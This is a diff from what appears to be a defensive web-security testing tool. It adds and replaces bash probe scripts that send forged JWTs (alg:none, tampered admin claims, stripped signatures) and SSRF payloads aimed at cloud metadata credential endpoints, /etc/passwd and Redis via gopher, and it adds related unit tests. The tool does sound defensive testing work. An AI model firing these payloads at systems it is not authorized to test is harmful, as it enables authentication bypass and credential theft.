+ else printf ' FAIL %-28s expected:%s actual:%s\n' "$1" "$2" "$3"; FAIL_COUNT=$((FAIL_COUNT+1)); FAIL_LINES+=("$1 expected $2 got $3"); fi
30
+ }
31
+ echo "=== JWT attacks vs $TEST_URL ==="
32
+ code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $ACCESS_TOKEN"); check "sanity (legit token)" "200" "$code"
33
+ DECODED_P=$(echo "$P" | python3 -c "import sys,base64; d=sys.stdin.read(); print(base64.urlsafe_b64decode(d+'=='*(4-len(d)%4)).decode())" 2>/dev/null || echo '{}')
34
+
35
+ NEW_H=$(printf '{"alg":"none","typ":"JWT"}' | b64url); code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${NEW_H}.${P}."); check "alg:none bypass" "401" "$code"
36
+ HS=$(printf '{"alg":"HS256","typ":"JWT"}' | b64url)
37
+ TP=$(printf '%s' "$DECODED_P" | python3 -c "import sys,json,time
38
+ try: d=json.loads(sys.stdin.read() or '{}')
39
+ except Exception: d={}
40
+ d['admin']=True; d['exp']=int(time.time())+3600
41
+ print(json.dumps(d))" 2>/dev/null || echo '{}')
42
+ TPB=$(printf '%s' "$TP" | b64url)
43
+ WSIG=$(printf '%s.%s' "$HS" "$TPB" | python3 -c "import sys,hmac,hashlib,base64; print(base64.urlsafe_b64encode(hmac.new(b'wrong-secret',sys.stdin.buffer.read(),hashlib.sha256).digest()).decode().rstrip('='))")
44
+ code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${HS}.${TPB}.${WSIG}"); check "tampered claims + wrong sig" "401" "$code"
45
+ EP=$(echo "$DECODED_P" | python3 -c "import sys,json,time;
46
+ try: d=json.loads(sys.stdin.read())
47
+ except: d={}
48
+ d['exp']=int(time.time())-60; print(json.dumps(d))" 2>/dev/null || echo '{}')
49
+ EPB=$(printf '%s' "$EP" | b64url); code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${H}.${EPB}.${S}"); check "expired exp" "401" "$code"
50
+ code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer ${H}.${P}."); check "stripped signature" "401" "$code"
51
+ code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer not-a-jwt"); check "garbage token" "401" "$code"
52
+
53
+ if [ -n "${REFRESH_TOKEN:-}" ]; then
54
+ curl -s -o /dev/null -X POST "$TARGET${LOGOUT_PATH:-/api/auth/logout}" -H "Authorization: Bearer $ACCESS_TOKEN" -H 'content-type: application/json' -d "{\"refreshToken\":\"$REFRESH_TOKEN\"}" || true
55
+ code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET${REFRESH_PATH:-/api/auth/refresh}" -H 'content-type: application/json' -d "{\"refreshToken\":\"$REFRESH_TOKEN\"}")
56
+ [ "$code" = "401" ] && echo " PASS refresh-after-logout (invalidated)" || echo " WARN refresh-after-logout actual:$code (stateless replay? document the tradeoff)"
57
+ fi
58
+
59
+ echo "=== Summary: PASS=$PASS_COUNT FAIL=$FAIL_COUNT ==="
60
+ [ "$FAIL_COUNT" -gt 0 ] && { printf ' - %s\n' "${FAIL_LINES[@]}"; exit 1; }
61
+ echo "All JWT attacks blocked — auth layer holds."
@@ -0,0 +1,62 @@
1
+ #!/usr/bin/env bash
2
+ # ssrf-probes.sh — SSRF probe, FACTS-driven. For each url-accepting endpoint the recon
3
+ # flagged (probe-context.json → ssrf_candidates), inject classic SSRF targets into that
4
+ # param and watch for IMDS/file/redis evidence or a tell-tale slow fetch. Expect
5
+ # 400/403/422 (host validation) or a clean 200 with no credential/IMDS content.
6
+ # Exit: 0 = no definitive SSRF (or no candidates), 1 = leaked content seen, 2 = TARGET/context unusable.
7
+ # Env (see _lib.py): TARGET, and usually TOKEN_A=<jwt> (or COOKIE_A) since these are
8
+ # typically admin/integration endpoints. Run only against a TEST instance.
9
+ set -uo pipefail
10
+ cd "$(dirname "$0")"
11
+ ctx=probe-context.json
12
+
13
+ TARGET="${TARGET:-$(python3 -c "import json;print(json.load(open('$ctx'))['target_base_url'])" 2>/dev/null)}"
14
+ if [ -z "${TARGET:-}" ] || [ "${TARGET#FILL}" != "$TARGET" ]; then echo "Set TARGET=http://host:port (or fill probe-context.json)"; exit 2; fi
15
+ AUTH=()
16
+ [ -n "${TOKEN_A:-}" ] && AUTH=(-H "Authorization: Bearer $TOKEN_A")
17
+ [ -z "${TOKEN_A:-}" ] && [ -n "${COOKIE_A:-}" ] && AUTH=(-H "Cookie: $COOKIE_A")
18
+ [ ${#AUTH[@]} -eq 0 ] && echo " (no TOKEN_A/COOKIE_A — probing unauthenticated; most SSRF sinks need auth)"
19
+
20
+ # url-accepting endpoints recon flagged → "METHOD /path PARAM" lines; a failed read is a config error, not "N/A"
21
+ cand_lines=$(python3 -c "
22
+ import json, re
23
+ for c in json.load(open('$ctx'))['endpoints'].get('ssrf_candidates', []):
24
+     m = re.match(r'(\w+)\s+(\S+).*param:\s*([\w.-]+)', c)
25
+     if m: print(m.group(1), m.group(2), m.group(3))
26
+ " 2>/dev/null) || { echo "Could not read ssrf_candidates from $ctx (python3 missing, file absent/invalid JSON, or no 'endpoints' key)"; exit 2; }
27
+ CANDS=(); while IFS= read -r line; do [ -n "$line" ] && CANDS+=("$line"); done <<< "$cand_lines" # (portable; macOS ships bash 3.2 which lacks `mapfile`)
28
+ if [ "${#CANDS[@]}" -eq 0 ]; then
29
+   echo "No SSRF candidates in probe-context.json (recon found no url/domain-ish params). N/A for this app."; exit 0
30
+ fi
31
+
32
+ SSRF_TARGETS=(
33
+   "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
34
+   "http://169.254.170.2/v2/credentials/"
35
+   "http://127.0.0.1/"
36
+   "http://10.0.0.1/"
37
+   "file:///etc/passwd"
38
+   "gopher://127.0.0.1:6379/_INFO"
39
+ )
40
+ fails=0; warns=0
41
+ for cand in "${CANDS[@]}"; do
42
+   read -r method path param <<< "$cand"
43
+   for url in "${SSRF_TARGETS[@]}"; do
44
+     body=$(python3 -c "import json,sys; print(json.dumps({sys.argv[1]: sys.argv[2]}))" "$param" "$url")
45
+     start=$(date +%s)
46
+     resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X "$method" "$TARGET$path" ${AUTH[@]+"${AUTH[@]}"} -H 'content-type: application/json' -d "$body" 2>&1 || true)
47
+     dur=$(( $(date +%s) - start ))
48
+     code=$(printf '%s' "$resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
49
+     bod=$(printf '%s' "$resp" | grep -v 'HTTP_CODE:') # whole body: leaked content may sit past the first 200 bytes
50
+     if printf '%s' "$bod" | grep -qE 'AccessKeyId|SecretAccessKey|InstanceId|root:x:0:0|redis_version'; then
51
+       printf ' FAIL %s %s [%s] %s → IMDS/file/redis CONTENT LEAKED\n' "$method" "$path" "${code:-?}" "$param=$url"; fails=$((fails+1))
52
+     elif [[ "$url" == *169.254.* && "$dur" -gt 5 ]]; then
53
+       printf ' WARN %s %s [%s,%ss] %s → slow; backend may have fetched it\n' "$method" "$path" "${code:-?}" "$dur" "$url"; warns=$((warns+1))
54
+     elif [[ "$code" =~ ^(400|403|422)$ ]]; then
55
+       printf ' ok %s %s [%s] %s validation rejected\n' "$method" "$path" "$code" "$url"
56
+     else
57
+       printf ' ? %s %s [%s] %s\n' "$method" "$path" "${code:-?}" "$url"
58
+     fi
59
+   done
60
+ done
61
+ echo "summary: $fails definitive SSRF · $warns suspicious (review)"
62
+ [ "$fails" -eq 0 ] || exit 1 # fixed code: a raw count wraps at 256 and a count of 2 would read as the config-error status
@@ -15,7 +15,8 @@ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then
15
15
  echo "Set TARGET=http://host:port (or fill target_base_url in probe-context.json)"; exit 2
16
16
  fi
17
17
 
18
- mapfile -t EPS < <(python3 -c "import json;[print(e) for e in json.load(open('$ctx'))['endpoints']['writes']]" 2>/dev/null)
18
+ EPS=() # (portable; macOS bash 3.2 lacks `mapfile`)
19
+ while IFS= read -r line; do [ -n "$line" ] && EPS+=("$line"); done < <(python3 -c "import json;[print(e) for e in json.load(open('$ctx'))['endpoints']['writes']]" 2>/dev/null)
19
20
  if [ "${#EPS[@]}" -eq 0 ]; then
20
21
  echo "No write endpoints in probe-context.json — add 'METHOD /path' lines under endpoints.writes."; exit 2
21
22
  fi
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: websec-validator
3
- Version: 0.2.3
3
+ Version: 0.2.4
4
4
  Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
5
5
  Author: Ricardo Accioly
6
6
  License: MIT
@@ -172,6 +172,14 @@ class CalibrationTests(unittest.TestCase):
172
172
  class FieldFeedbackBatch1Tests(unittest.TestCase):
173
173
  """Regressions for the field-test false positives (proxy.ts, self-scan, ASIA)."""
174
174
 
175
+ def test_unsafe_decoder_feeding_auth_flagged(self): # F5: an unverified JWT decoder used inside an auth guard must be reported
176
+     with tempfile.TemporaryDirectory() as tmp: # removed on exit; a bare mkdtemp() would leave the directory behind
177
+         d = Path(tmp)
178
+         (d / "requireAdmin.ts").write_text("export function requireAdmin(req){ const p = decodeJwtPayloadUnsafe(req.cookies.t); if(!p.isAdmin) throw 0; }")
179
+         (d / "util.ts").write_text("export const add = (a,b) => a+b") # no auth + no unsafe → not flagged
180
+         out = AuthzExtractor().extract(RepoContext(d), {"routes": {"endpoints": []}})
181
+         self.assertIn("decodeJwtPayloadUnsafe", [u["decoder"] for u in out["unsafe_auth_decoders"]])
182
+
175
183
  def _next_app(self, proxy_body):
176
184
  d = Path(tempfile.mkdtemp())
177
185
  (d / "src").mkdir()
@@ -267,6 +275,22 @@ class ProbeStagingTests(unittest.TestCase):
267
275
  self.assertNotIn("security/pentest", blob)
268
276
 
269
277
 
278
+ class ExcludeAndScannerSelectTests(unittest.TestCase): # F4: user-supplied excludes must reach the repo walk and the scanners
279
+     def test_repocontext_honors_excludes(self): # an excluded directory must not appear in code_files
280
+         with tempfile.TemporaryDirectory() as tmp: # removed on exit; a bare mkdtemp() would leave the directory behind
281
+             d = Path(tmp); (d / "src").mkdir(); (d / "keep").mkdir()
282
+             (d / "src" / "a.py").write_text("x=1")
283
+             (d / "keep" / "b.py").write_text("y=1")
284
+             ctx = RepoContext(d, excludes=["src"])
285
+             rels = {ctx.rel(p) for p in ctx.code_files} # built while the fixture files still exist
286
+         self.assertIn("keep/b.py", rels)
287
+         self.assertNotIn("src/a.py", rels) # --exclude src dropped it
288
+
289
+     def test_scanner_argv_includes_user_excludes(self): # the exclude value must appear in what each scanner builder returns
290
+         self.assertIn("docs", scanners._trivy(Path("/r"), Path("/o"), excludes=["docs"]))
291
+         self.assertIn("docs", scanners._semgrep(Path("/r"), Path("/o"), excludes=["docs"]))
292
+
293
+
270
294
  class RouteUnitTests(unittest.TestCase):
271
295
  def test_clean_path(self):
272
296
  self.assertEqual(routes._clean_path("/api/users/:id"), "/api/users/{id}")
@@ -284,12 +308,24 @@ class RouteUnitTests(unittest.TestCase):
284
308
  {"method": "GET", "url": "/items/<int:pk>", "params": [], "details": {"technology": "django", "code_paths": [{"path": "b"}]}},
285
309
  {"method": "GET", "url": "/assets/*.png", "params": [], "details": {}},
286
310
  ]
287
- paths = {(r["method"], r["path"]) for r in routes._normalize_noir(eps)}
311
+ app, _spec = routes._normalize_noir(eps)
312
+ paths = {(r["method"], r["path"]) for r in app}
288
313
  self.assertIn(("GET", "/api/x/{id}"), paths) # :id and {id} collapsed
289
314
  self.assertIn(("GET", "/items/{pk}"), paths) # django <int:pk> normalized
290
315
  self.assertNotIn(("GET", "/assets/*.png"), paths) # static-asset glob filtered
291
316
  self.assertEqual(sum(1 for _m, p in paths if p == "/api/x/{id}"), 1)
292
317
 
318
+ def test_vendored_spec_routes_split_out(self): # B1: routes sourced from spec/vendored files are returned separately
319
+     def ep(method, url, src): return {"method": method, "url": url, "details": {"code_paths": [{"path": src}]}}
320
+     app_routes, spec_routes = routes._normalize_noir([
321
+         ep("GET", "/api/sponsors", "src/app/api/sponsors/route.ts"),
322
+         ep("POST", "/vault/accounts", "docs-implementation/fireblocks-swagger.yaml"),
323
+         ep("POST", "/graphql", "packages/cdk/schemas/appsync.graphql"),
324
+         ep("GET", "/users", "node_modules/some-lib/openapi.json"),
325
+     ])
326
+     self.assertEqual([(r["method"], r["path"]) for r in app_routes], [("GET", "/api/sponsors")]) # only the real handler
327
+     self.assertEqual(len(spec_routes), 3) # swagger + graphql + node_modules openapi excluded
328
+
293
329
  def test_derive_targeting(self):
294
330
  d = routes._derive([
295
331
  {"method": "POST", "path": "/api/groups/{groupId}/items", "params": [{"name": "url", "where": "query"}]},
@@ -1,161 +0,0 @@
1
- #!/usr/bin/env bash
2
- #
3
- # jwt-attacks.sh — manual JWT attack probe.
4
- #
5
- # Six classic JWT attacks pentest teams run:
6
- #
7
- # 1. alg:none — sign with no algorithm. If the backend accepts it, total auth bypass.
8
- # 2. HS256 with garbage secret — tamper claims and resign with a wrong key.
9
- # 3. Expired token — exp in the past, expect 401.
10
- # 4. Stripped signature — empty sig segment.
11
- # 5. Garbage token — non-JWT string.
12
- # 6. Refresh-after-logout — logout, then try the still-cached refresh token.
13
- #
14
- # Usage:
15
- # 1. In .env, set ZAP_AGENT_USER / ZAP_AGENT_PASS.
16
- # 2. ./jwt-attacks.sh
17
- # 3. Output: one PASS/FAIL per attack; nonzero exit on FAIL.
18
- #
19
- # Requires: bash, curl, jq, python3.
20
- set -euo pipefail
21
- cd "$(dirname "$0")"
22
-
23
- [[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
24
-
25
- read_env() {
26
- local key="$1"
27
- python3 -c "
28
- for l in open('.env'):
29
- l = l.rstrip('\n')
30
- if l.startswith('#') or '=' not in l: continue
31
- k, v = l.split('=', 1)
32
- if k.strip() == '$key':
33
- print(v); break
34
- "
35
- }
36
-
37
- TARGET="$(read_env ZAP_TARGET)"
38
- USER="$(read_env ZAP_AGENT_USER)"
39
- PASS="$(read_env ZAP_AGENT_PASS)"
40
-
41
- [[ -n "$TARGET" && -n "$USER" && -n "$PASS" ]] || {
42
- echo "ERROR: ZAP_TARGET / ZAP_AGENT_USER / ZAP_AGENT_PASS required in .env" >&2; exit 2
43
- }
44
-
45
- # TODO: adjust login / refresh / me / logout paths to your API.
46
- echo "==> mint legit token..."
47
- LOGIN_RESP=$(curl -fsS -X POST "$TARGET/api/auth/login" \
48
- -H 'Content-Type: application/json' \
49
- -d "$(jq -nc --arg e "$USER" --arg p "$PASS" '{email:$e,password:$p}')")
50
-
51
- ACCESS_TOKEN=$(echo "$LOGIN_RESP" | jq -r '.tokens.accessToken')
52
- REFRESH_TOKEN=$(echo "$LOGIN_RESP" | jq -r '.tokens.refreshToken')
53
-
54
- [[ -n "$ACCESS_TOKEN" && "$ACCESS_TOKEN" != "null" ]] || { echo "login failed" >&2; exit 3; }
55
-
56
- b64url() {
57
- python3 -c "import sys, base64; sys.stdout.write(base64.urlsafe_b64encode(sys.stdin.buffer.read()).decode().rstrip('='))"
58
- }
59
-
60
- IFS='.' read -r H P S <<< "$ACCESS_TOKEN"
61
-
62
- # A protected endpoint that requires a real session. Adjust to your API.
63
- TEST_URL="$TARGET/api/auth/me"
64
-
65
- PASS_COUNT=0
66
- FAIL_COUNT=0
67
- FAIL_LINES=()
68
-
69
- check() {
70
- local label="$1" expected_code="$2" actual="$3"
71
- if [[ "$actual" == "$expected_code" ]]; then
72
- printf ' %-4s %-30s expected:%s actual:%s\n' PASS "$label" "$expected_code" "$actual"
73
- PASS_COUNT=$((PASS_COUNT+1))
74
- else
75
- printf ' %-4s %-30s expected:%s actual:%s\n' FAIL "$label" "$expected_code" "$actual"
76
- FAIL_COUNT=$((FAIL_COUNT+1))
77
- FAIL_LINES+=("$label expected $expected_code got $actual")
78
- fi
79
- }
80
-
81
- # === Sanity: legit token works ===
82
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $ACCESS_TOKEN")
83
- check "sanity (legit token)" "200" "$code"
84
-
85
- # === Attack 1: alg:none ===
86
- DECODED_P=$(echo "$P" | python3 -c "import sys, base64; d=sys.stdin.read(); print(base64.urlsafe_b64decode(d + '=='*(4-len(d)%4)).decode())")
87
- NEW_H=$(echo -n '{"alg":"none","typ":"JWT"}' | b64url)
88
- NONE_TOKEN="${NEW_H}.${P}."
89
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $NONE_TOKEN")
90
- check "alg:none bypass" "401" "$code"
91
-
92
- # === Attack 2: HS256 with garbage secret + tampered claims ===
93
- # TODO: adjust claim names to your token's shape (role, roles, scope, permissions, etc.)
94
- TAMPERED_P=$(echo "$DECODED_P" | jq -c '.roleIds = ["role-platform-manager","role-developer"] | .iat = (now|floor) | .exp = ((now|floor) + 3600)')
95
- TAMPERED_P_B64=$(echo -n "$TAMPERED_P" | b64url)
96
- HEADER_HS256=$(echo -n '{"alg":"HS256","typ":"JWT"}' | b64url)
97
- WRONG_SIG=$(printf '%s.%s' "$HEADER_HS256" "$TAMPERED_P_B64" \
98
- | python3 -c "import sys, hmac, hashlib, base64; data=sys.stdin.buffer.read(); sig=hmac.new(b'wrong-secret-do-not-trust', data, hashlib.sha256).digest(); sys.stdout.write(base64.urlsafe_b64encode(sig).decode().rstrip('='))")
99
- TAMPERED_TOKEN="${HEADER_HS256}.${TAMPERED_P_B64}.${WRONG_SIG}"
100
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $TAMPERED_TOKEN")
101
- check "claims tampered, wrong sig" "401" "$code"
102
-
103
- # === Attack 3: expired token ===
104
- EXPIRED_P=$(echo "$DECODED_P" | jq -c '.exp = ((now|floor) - 60) | .iat = ((now|floor) - 3600)')
105
- EXPIRED_P_B64=$(echo -n "$EXPIRED_P" | b64url)
106
- EXP_SIG=$(printf '%s.%s' "$H" "$EXPIRED_P_B64" \
107
- | python3 -c "import sys, hmac, hashlib, base64; data=sys.stdin.buffer.read(); sig=hmac.new(b'will-not-match', data, hashlib.sha256).digest(); sys.stdout.write(base64.urlsafe_b64encode(sig).decode().rstrip('='))")
108
- EXP_TOKEN="${H}.${EXPIRED_P_B64}.${EXP_SIG}"
109
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $EXP_TOKEN")
110
- check "expired exp + bad sig" "401" "$code"
111
-
112
- # === Attack 4: stripped signature ===
113
- NO_SIG="${H}.${P}."
114
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer $NO_SIG")
115
- check "stripped signature" "401" "$code"
116
-
117
- # === Attack 5: garbage token ===
118
- code=$(curl -s -o /dev/null -w '%{http_code}' "$TEST_URL" -H "Authorization: Bearer not-a-jwt")
119
- check "garbage token" "401" "$code"
120
-
121
- # === Attack 6: refresh-token replay after logout ===
122
- echo "==> logging out then attempting refresh replay..."
123
- curl -fsS -X POST "$TARGET/api/auth/logout" \
124
- -H "Authorization: Bearer $ACCESS_TOKEN" \
125
- -H 'Content-Type: application/json' \
126
- -d "$(jq -nc --arg r "$REFRESH_TOKEN" '{refreshToken:$r}')" \
127
- >/dev/null 2>&1 || echo " (logout endpoint may not invalidate refresh tokens — continuing)"
128
-
129
- if [[ -n "$REFRESH_TOKEN" && "$REFRESH_TOKEN" != "null" ]]; then
130
- code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET/api/auth/refresh" \
131
- -H 'Content-Type: application/json' \
132
- -d "$(jq -nc --arg r "$REFRESH_TOKEN" '{refreshToken:$r}')")
133
- # Acceptable outcomes:
134
- # 401 — token was invalidated on logout (best)
135
- # 200 — refresh tokens are stateless and replay is possible (acceptable per
136
- # the project's auth model; document the tradeoff)
137
- if [[ "$code" == "401" ]]; then
138
- printf ' %-4s %-30s expected:401 actual:%s (refresh token invalidated on logout)\n' PASS "refresh-after-logout" "$code"
139
- PASS_COUNT=$((PASS_COUNT+1))
140
- elif [[ "$code" == "200" ]]; then
141
- printf ' %-4s %-30s expected:401 actual:%s (refresh tokens are stateless; document tradeoff)\n' WARN "refresh-after-logout" "$code"
142
- else
143
- printf ' %-4s %-30s expected:401 actual:%s\n' FAIL "refresh-after-logout" "$code"
144
- FAIL_COUNT=$((FAIL_COUNT+1))
145
- FAIL_LINES+=("refresh-after-logout got $code")
146
- fi
147
- else
148
- echo " (refresh token not present in login response — skip)"
149
- fi
150
-
151
- echo
152
- echo "=== Summary ==="
153
- echo " PASS: $PASS_COUNT"
154
- echo " FAIL: $FAIL_COUNT"
155
- if [[ $FAIL_COUNT -gt 0 ]]; then
156
- echo
157
- echo "FAILED:"
158
- printf ' - %s\n' "${FAIL_LINES[@]}"
159
- exit 1
160
- fi
161
- echo "All JWT attacks blocked — auth layer holds."
@@ -1,189 +0,0 @@
1
- #!/usr/bin/env bash
2
- #
3
- # ssrf-probes.sh — manual SSRF probe.
4
- #
5
- # Admin endpoints often accept URL-shaped fields (SSO domain, integration base
6
- # URLs, etc.). If a handler fetches those URLs server-side without validating
7
- # the host, an attacker who controls an admin account (or finds an admin auth
8
- # bypass) can force the backend to fetch AWS IMDS credentials, internal
9
- # services, or arbitrary intranet hosts.
10
- #
11
- # This probe attempts each known URL-accepting admin endpoint with classic
12
- # SSRF targets:
13
- # - 169.254.169.254 — AWS EC2 IMDSv1 metadata endpoint
14
- # - 169.254.170.2 — ECS task metadata
15
- # - 127.0.0.1:3000 — localhost
16
- # - 10.0.0.1 — RFC1918 internal
17
- # - file:// — local file scheme (some HTTP libraries support this)
18
- #
19
- # Expected: each request returns 400/403 (input validation refuses the host),
20
- # or 200 with an error body that does NOT contain credential material / IMDS
21
- # response shapes. A response time > 5s on an IMDS URL (without immediate
22
- # rejection) is a strong signal the backend actually fetched it.
23
- #
24
- # Usage:
25
- # 1. Set ZAP_ADMIN_USER / ZAP_ADMIN_PASS in .env.
26
- # 2. ./ssrf-probes.sh
27
- set -euo pipefail
28
- cd "$(dirname "$0")"
29
-
30
- [[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
31
-
32
- read_env() {
33
- local key="$1"
34
- python3 -c "
35
- for l in open('.env'):
36
- l = l.rstrip('\n')
37
- if l.startswith('#') or '=' not in l: continue
38
- k, v = l.split('=', 1)
39
- if k.strip() == '$key':
40
- print(v); break
41
- "
42
- }
43
-
44
- TARGET="$(read_env ZAP_TARGET)"
45
- USER="$(read_env ZAP_ADMIN_USER)"
46
- PASS="$(read_env ZAP_ADMIN_PASS)"
47
-
48
- [[ -n "$TARGET" && -n "$USER" && -n "$PASS" ]] || {
49
- echo "ERROR: ZAP_TARGET / ZAP_ADMIN_USER / ZAP_ADMIN_PASS required in .env" >&2
50
- echo "SSRF probes need an admin account (system/integration permissions)" >&2
51
- exit 2
52
- }
53
-
54
- echo "==> minting admin token..."
55
- TOKEN=$(curl -fsS -X POST "$TARGET/api/auth/login" \
56
- -H 'Content-Type: application/json' \
57
- -d "$(jq -nc --arg e "$USER" --arg p "$PASS" '{email:$e,password:$p}')" \
58
- | jq -r '.tokens.accessToken')
59
- [[ -n "$TOKEN" && "$TOKEN" != "null" ]] || { echo "admin login failed" >&2; exit 3; }
60
-
61
- SSRF_TARGETS=(
62
- "http://169.254.169.254/latest/meta-data/"
63
- "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
64
- "http://169.254.170.2/v2/credentials/"
65
- "http://127.0.0.1:3000/api/admin/users"
66
- "http://10.0.0.1/"
67
- "http://[::1]:3000/"
68
- "file:///etc/passwd"
69
- "gopher://127.0.0.1:6379/_INFO"
70
- )
71
-
72
- FAIL_COUNT=0
73
- WARN_COUNT=0
74
- FAIL_LINES=()
75
-
76
- PROBE_PUT() {
77
- local label="$1" endpoint="$2" body_template="$3"
78
- for url in "${SSRF_TARGETS[@]}"; do
79
- local body
80
- body=$(echo "$body_template" | sed "s|{SSRF}|$url|g")
81
- local start end duration code body_resp
82
- start=$(date +%s)
83
- body_resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X PUT "$TARGET$endpoint" \
84
- -H "Authorization: Bearer $TOKEN" \
85
- -H 'Content-Type: application/json' \
86
- -d "$body" 2>&1 || true)
87
- end=$(date +%s)
88
- duration=$((end - start))
89
- code=$(echo "$body_resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
90
- body_clean=$(echo "$body_resp" | grep -v 'HTTP_CODE:' | head -c 200)
91
- evaluate_response "$label" "PUT $endpoint url=$url" "$code" "$duration" "$body_clean"
92
- done
93
- }
94
-
95
- PROBE_POST() {
96
- local label="$1" endpoint="$2" body_template="$3"
97
- for url in "${SSRF_TARGETS[@]}"; do
98
- local body
99
- body=$(echo "$body_template" | sed "s|{SSRF}|$url|g")
100
- local start end duration code body_resp
101
- start=$(date +%s)
102
- body_resp=$(curl -s -m 8 -w '\nHTTP_CODE:%{http_code}' -X POST "$TARGET$endpoint" \
103
- -H "Authorization: Bearer $TOKEN" \
104
- -H 'Content-Type: application/json' \
105
- -d "$body" 2>&1 || true)
106
- end=$(date +%s)
107
- duration=$((end - start))
108
- code=$(echo "$body_resp" | grep -oE 'HTTP_CODE:[0-9]+' | cut -d: -f2)
109
- body_clean=$(echo "$body_resp" | grep -v 'HTTP_CODE:' | head -c 200)
110
- evaluate_response "$label" "POST $endpoint url=$url" "$code" "$duration" "$body_clean"
111
- done
112
- }
113
-
114
- evaluate_response() {
115
- local label="$1" probe="$2" code="$3" duration="$4" body="$5"
116
- if echo "$body" | grep -qE 'AccessKeyId|SecretAccessKey|InstanceId|root:x:0:0|redis_version'; then
117
- printf ' %-4s %s [code=%s, %ds] EVIDENCE OF SSRF in body!\n' FAIL "$probe" "$code" "$duration"
118
- FAIL_COUNT=$((FAIL_COUNT+1))
119
- FAIL_LINES+=("$label $probe — IMDS/file/redis content leaked")
120
- return
121
- fi
122
- if [[ "$probe" == *"169.254.169.254"* || "$probe" == *"169.254.170.2"* ]]; then
123
- if [[ "$duration" -gt 5 ]]; then
124
- printf ' %-4s %s [code=%s, %ds] slow response — backend may have fetched IMDS\n' WARN "$probe" "$code" "$duration"
125
- WARN_COUNT=$((WARN_COUNT+1))
126
- return
127
- fi
128
- fi
129
- if [[ "$code" == "400" || "$code" == "403" || "$code" == "422" ]]; then
130
- printf ' %-4s %s [code=%s, %ds] validation rejected\n' PASS "$probe" "$code" "$duration"
131
- return
132
- fi
133
- if [[ "$code" == "500" ]]; then
134
- printf ' %-4s %s [code=%s, %ds] backend errored — verify it did not attempt the fetch\n' WARN "$probe" "$code" "$duration"
135
- WARN_COUNT=$((WARN_COUNT+1))
136
- return
137
- fi
138
- if [[ "$code" == "200" ]]; then
139
- printf ' %-4s %s [code=%s, %ds] 200 OK no IMDS evidence (handled gracefully)\n' PASS "$probe" "$code" "$duration"
140
- return
141
- fi
142
- printf ' %-4s %s [code=%s, %ds]\n' PASS "$probe" "$code" "$duration"
143
- }
144
-
145
- # PROJECT-SPECIFIC START
146
- # These probes target the URL-accepting admin endpoints in your application.
147
- # REPLACE them with your project's endpoints. Look for any admin handler that
148
- # takes a URL/host/endpoint/domain field in its request body. Common shapes:
149
- # - SSO settings (issuer URL, metadata URL, callback)
150
- # - Integration config (webhook target, S3 endpoint, GraphQL URL)
151
- # - "Test connection" endpoints
152
-
153
- echo "=== SSO settings — typically accepts SSO domain / issuer URLs ==="
154
- PROBE_PUT "sso-settings" "/api/auth/sso/settings" \
155
- '{"enabled":true,"issuer":"{SSRF}","clientId":"x","clientSecret":"y","metadataUrl":"{SSRF}"}'
156
-
157
- echo
158
- echo "=== SSO test endpoint ==="
159
- PROBE_POST "sso-test" "/api/auth/sso/test" '{"domain":"{SSRF}"}'
160
-
161
- echo
162
- echo "=== Integration settings — third-party base URL etc. ==="
163
- PROBE_PUT "integrations" "/api/admin/integrations" \
164
- '{"providerBaseUrl":"{SSRF}","providerApiKey":"x"}'
165
-
166
- echo
167
- echo "=== Integration test endpoints ==="
168
- PROBE_POST "test-s3" "/api/admin/integrations/test/s3" \
169
- '{"awsS3Endpoint":"{SSRF}","awsS3Bucket":"test","awsS3Region":"us-east-1","awsS3AccessKeyId":"AKIA","awsS3SecretAccessKey":"x"}'
170
- PROBE_POST "test-graphql" "/api/admin/integrations/test/graphql" \
171
- '{"graphqlUrl":"{SSRF}","apiKey":"x"}'
172
- # PROJECT-SPECIFIC END
173
-
174
- echo
175
- echo "=== Summary ==="
176
- echo " FAIL (definitive SSRF evidence): $FAIL_COUNT"
177
- echo " WARN (suspicious — manual review): $WARN_COUNT"
178
- if [[ $FAIL_COUNT -gt 0 ]]; then
179
- echo
180
- echo "REAL SSRF FINDINGS:"
181
- printf ' - %s\n' "${FAIL_LINES[@]}"
182
- exit 1
183
- fi
184
- if [[ $WARN_COUNT -gt 0 ]]; then
185
- echo
186
- echo "Review the WARN lines manually — they may indicate the backend"
187
- echo "is fetching the URL even though no credential content leaked back."
188
- fi
189
- echo "No SSRF evidence found."